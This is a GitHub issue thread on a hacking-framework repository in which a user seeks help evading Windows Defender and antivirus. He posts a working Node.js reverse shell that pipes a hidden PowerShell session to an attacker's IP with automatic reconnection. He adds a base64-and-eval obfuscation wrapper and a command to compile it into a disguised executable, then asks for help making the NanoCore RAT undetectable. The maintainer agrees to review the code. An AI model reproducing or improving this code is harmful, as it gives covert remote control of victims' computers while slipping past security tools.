r0jahsm0ntar1 / africana-framework

The africana-framework is a software designed for network & web hacking by automating as much stuff as possible to detect vulnerabilities on most common services and web technologies. It also has some wide range of penetration testing from internal network, Wi-Fi, system anonymity to web bug hunting. It's purely written for Good and not Evil.
17 stars 7 forks source link

Contact me insta id:alta_bross #2

Open altabross opened 3 months ago

altabross commented 3 months ago

Have Questions and ideas related your projects

r0jahsm0ntar1 commented 3 months ago

Please do it...

altabross commented 3 months ago

what

On Tue, 9 Apr 2024 at 18:38, Rojahs Montari @.***> wrote:

Please do it...

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2045759542, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRFFDALOE2FFMBUE5XDY4QRRNAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANBVG42TSNJUGI . You are receiving this because you authored the thread.Message ID: @.***>

r0jahsm0ntar1 commented 3 months ago

I am waiting for your opinion

altabross commented 3 months ago

I just want to ask how you bypass windows defender and AV what type of obsucation and encryption you use can you guide me please from where I can learn the obsucation and encryption things I have created my .exe in .js it give us Reverse Shell of windows computer actually what I did I encrypt or encoded .js reverse shell script in base64 and than again write a script in .js that decrypt that original base64 .js reverse shell script and run it I compile it to .exe but I am facing only two problems sir number 1 the cmd come and go how can we do silent execution without a vbs script and the other issue is how can I add download and upload feature in my reverse shell. Bro I will send you the .js script and can you upgrade it and add download or upload feature or guide me how to do that I just use netcat for listener and I get the both cmd and powershell shell both commands can run in my shell.

On Wed, Apr 10, 2024, 10:28 AM Rojahs Montari @.***> wrote:

I am waiting for your opinion

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2047015871, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRE2IJ6GV5CKA3UGZ53Y4UA2LAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANBXGAYTKOBXGE . You are receiving this because you authored the thread.Message ID: @.***>

altabross commented 3 months ago

Also if you want you can add my reverse shell .exe in your framework if you want I will send you the .js code soon

On Wed, Apr 10, 2024, 10:28 AM Rojahs Montari @.***> wrote:

I am waiting for your opinion

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2047015871, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRE2IJ6GV5CKA3UGZ53Y4UA2LAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANBXGAYTKOBXGE . You are receiving this because you authored the thread.Message ID: @.***>

r0jahsm0ntar1 commented 2 months ago

Sorry for being offline for so long... send the code over and I can see what to do.

altabross commented 2 months ago

No worries!

On Fri, 19 Apr 2024 at 18:13, Rojahs Montari @.***> wrote:

Sorry for being offline for so long... send the code over and I can see what to do.

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2066977355, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRHYYGTGQG7NQ5K3UADY6FGEBAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANRWHE3TOMZVGU . You are receiving this because you authored the thread.Message ID: @.***>

altabross commented 2 months ago

here the .js code

On Fri, 19 Apr 2024 at 19:05, Alta Bross @.***> wrote:

No worries!

On Fri, 19 Apr 2024 at 18:13, Rojahs Montari @.***> wrote:

Sorry for being offline for so long... send the code over and I can see what to do.

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2066977355, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRHYYGTGQG7NQ5K3UADY6FGEBAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANRWHE3TOMZVGU . You are receiving this because you authored the thread.Message ID: @.***>

const { spawn } = require('child_process'); const net = require('net'); const address = 'your ip'; // Change this to your attacker machine's IP address const port = 443;

function connectToListener() { const client = net.connect(port, address, () => { // Do not display connection message const powershell = spawn('powershell.exe', ['-NoExit', '-WindowStyle', 'Hidden', '-Command', '-']);

    client.pipe(powershell.stdin);
    powershell.stdout.pipe(client);
    powershell.stderr.pipe(client);

    powershell.on('exit', () => {
        // No need to display disconnection message
        client.end();
    });
});

client.on('error', (err) => {
    console.error('Error:', err);
    setTimeout(connectToListener, 5000); // Retry connection after 5 seconds
});

client.on('close', () => {
    setTimeout(connectToListener, 5000); // Retry connection after 5 seconds
});

}

connectToListener();

altabross commented 2 months ago

first convert the provided code into base64 than use this code "const base64EncodedScript = "Your base64-encoded JavaScript code here";

// Decode the base64 string back to JavaScript const decodedScript = Buffer.from(base64EncodedScript, 'base64').toString('utf-8');

// Execute the decoded JavaScript code eval(decodedScript);" and compile it using this command pkg hidden.js --targets node12-win-x64 --output Newboy.exe

On Fri, 19 Apr 2024 at 19:07, Alta Bross @.***> wrote:

here the .js code

On Fri, 19 Apr 2024 at 19:05, Alta Bross @.***> wrote:

No worries!

On Fri, 19 Apr 2024 at 18:13, Rojahs Montari @.***> wrote:

Sorry for being offline for so long... send the code over and I can see what to do.

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2066977355, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRHYYGTGQG7NQ5K3UADY6FGEBAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANRWHE3TOMZVGU . You are receiving this because you authored the thread.Message ID: @.***>

altabross commented 2 months ago

last thing sir can i get your number our can you follow me back on twitter or any platform from where i can ask you some small questions and you answer them in your free time

On Fri, 19 Apr 2024 at 19:09, Alta Bross @.***> wrote:

first convert the provided code into base64 than use this code "const base64EncodedScript = "Your base64-encoded JavaScript code here";

// Decode the base64 string back to JavaScript const decodedScript = Buffer.from(base64EncodedScript, 'base64').toString('utf-8');

// Execute the decoded JavaScript code eval(decodedScript);" and compile it using this command pkg hidden.js --targets node12-win-x64 --output Newboy.exe

On Fri, 19 Apr 2024 at 19:07, Alta Bross @.***> wrote:

here the .js code

On Fri, 19 Apr 2024 at 19:05, Alta Bross @.***> wrote:

No worries!

On Fri, 19 Apr 2024 at 18:13, Rojahs Montari @.***> wrote:

Sorry for being offline for so long... send the code over and I can see what to do.

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2066977355, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRHYYGTGQG7NQ5K3UADY6FGEBAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANRWHE3TOMZVGU . You are receiving this because you authored the thread.Message ID: @.***>

r0jahsm0ntar1 commented 2 months ago

Ok fine no problem you van email me... rojahsmontari@gmail.com.. Let me check on your code then I will se what to do..

altabross commented 2 months ago

join my server here https://discord.gg/DaX4EucQ so we can talk their sir leave that java thingy Sir Can you help me out in making the NanoCore Rat exe undetectable from Windows Defnder and other AV i have absolutely no idea how can i bypass the .exe file from AV i can bypass powershell script and other thing but i failed to bypass the .exe of NannoCore Rat but i am sue you are the person who can do that so please can you help me out in that just need to make NannoCore RAT exe undetectable do what ever in it like in Encryption Obsucation just make it undetectable at Runtime PLease? here the rat IN ZIP FILE In the end please jin the discord server so we can talk their i have send you the friend request at discord as well This tool i am sending in ZIP because the github repository is ban by github or official due, because this rat tool NannoCore is used by most of the hackers on youtube Like scammersPayback please check it out and kindly find a way to bypass AV from the rat tool exe i am unable to send the ZIP file as it detects it malicious come on Discord i will send you there in my server

Thank you

On Thu, 2 May 2024 at 18:04, Silentsniper @.***> wrote:

add me on discord i got u both my username is Silentsniper0

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2091077934, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRGLK66JUKL3YSPSQCTZAJWYZAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDAOJRGA3TOOJTGQ . You are receiving this because you authored the thread.Message ID: @.***>

TNT5788 commented 2 months ago

@r0jahsm0ntar1 you should open a discord server where people can chat and give feedback on your framework.

altabross commented 2 months ago

broo add me as friend on discord i am unable to mdg you

On Mon, 13 May 2024 at 18:54, TNT5788 @.***> wrote:

@r0jahsm0ntar1 https://github.com/r0jahsm0ntar1 you should open a discord server where people can chat and give feedback on your framework.

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2108438980, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRBK5S33GTK7LASHQVTZCD45NAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDCMBYGQZTQOJYGA . You are receiving this because you authored the thread.Message ID: @.***>

r0jahsm0ntar1 commented 1 month ago

I will try it's that I am busy coding it to go lang and fixing bugs...

altabross commented 1 month ago

Okay!

On Fri, 24 May 2024 at 08:04, Rojahs Montari @.***> wrote:

I will try it's that I am busy coding it to go lang and fixing bugs...

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2128725846, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRCTXYAPMVT4JETF4QTZD3RADAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDCMRYG4ZDKOBUGY . You are receiving this because you authored the thread.Message ID: @.***>

r0jahsm0ntar1 commented 3 weeks ago

Have you checked Africana in go lang?

altabross commented 3 weeks ago

Not yet!

On Fri, Jun 21, 2024, 6:36 AM Rojahs Montari @.***> wrote:

Have you checked Africana in go lang?

— Reply to this email directly, view it on GitHub https://github.com/r0jahsm0ntar1/africana-framework/issues/2#issuecomment-2182034328, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7DMXRB2HLZOO77WWTCYXILZIO3VPAVCNFSM6AAAAABFZTVPEGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDCOBSGAZTIMZSHA . You are receiving this because you authored the thread.Message ID: @.***>